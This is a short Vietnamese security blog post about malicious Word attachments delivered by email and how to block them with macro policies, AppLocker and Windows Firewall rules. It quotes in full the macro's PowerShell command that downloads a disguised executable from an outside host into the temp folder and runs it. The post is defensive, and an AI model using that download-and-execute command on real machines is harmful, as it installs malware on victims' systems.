Tìm hiểu phương thức tấn công qua email và các cách xử lý

By | 12:21 pm | 18/12/2016

Thời gian gần đây chúng ta gặp rất nhiều các tài liệu word chứa mã độc được gửi qua email. Trong trường hợp này chuỗi thực hiện các tấn công sẽ là :

Email -> Word Doc -> Cmd.exe -> PowerShell -> Malware.exe

Khi người dùng nhấp chuột vào file đính kèm nó sẽ chạy một macro chạy lệnh PowerShell như sau:

cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile(‘http://www.tessaban.com/images/images/gfjfgklmslifdsfnln.png’,’%TMP%\scsnsys.exe’);Start-process ‘%TMP%\scsnsys.exe’;

Khi phân tích cách PowerShell tạo kết nối web, không có gì đặc biệt xảy ra trên mạng, Powershell không có chuỗi user-agent, rất khó để phát hiện.

GET /images/images/gfjfgklmslifdsfnln.png HTTP/1.1
Host: www.tessaban.com
Connection: Keep-Alive

Khi chúng ta hiểu được phương thức tấn công, chúng ta có thể ngăn chặn các cuộc tấn công sử dụng một trong các cách sau:
1. Dừng việc chuyển email
– Giữ file đính kèm vài giờ cho đến khi antivirus phát hiện ra
– Convert file sang định dạng khác (ví dụ word -> pdf)
– Xử lý macro trước khi chuyển email.
– Phân tích file đính kèm trước khi chuyển email.
– Ngăn chặn việc chạy macro
2. Chặn macro thông qua GPO
3. Chặn người dùng sử dụng cmd (sử dụng chính sách của AppLocker)
3. Chặn Powershell chạy các script lạ
4. Chặn download malware
5. Chặn Malware chạy trong thư mục tạm (C:\Users\me\AppData\Local\Temp\) sử dụng AppLocker

Ví dụ chúng ta có thể sử dụng chặn Powershell kết nối mạng sử dụng Windows Firewall bằng cách thêm vào firewall 2 rules như sau:

Name || Profile || Enabled || Action || Program || Local Address || Remote Address || Protocol || Local Port || Remote Port

Powershell1 || All || Yes || Block || %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe || Any || Any || Any || Any || Any
Powershell2 || All || Yes || Block || %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe || Any || Any || Any || Any || Any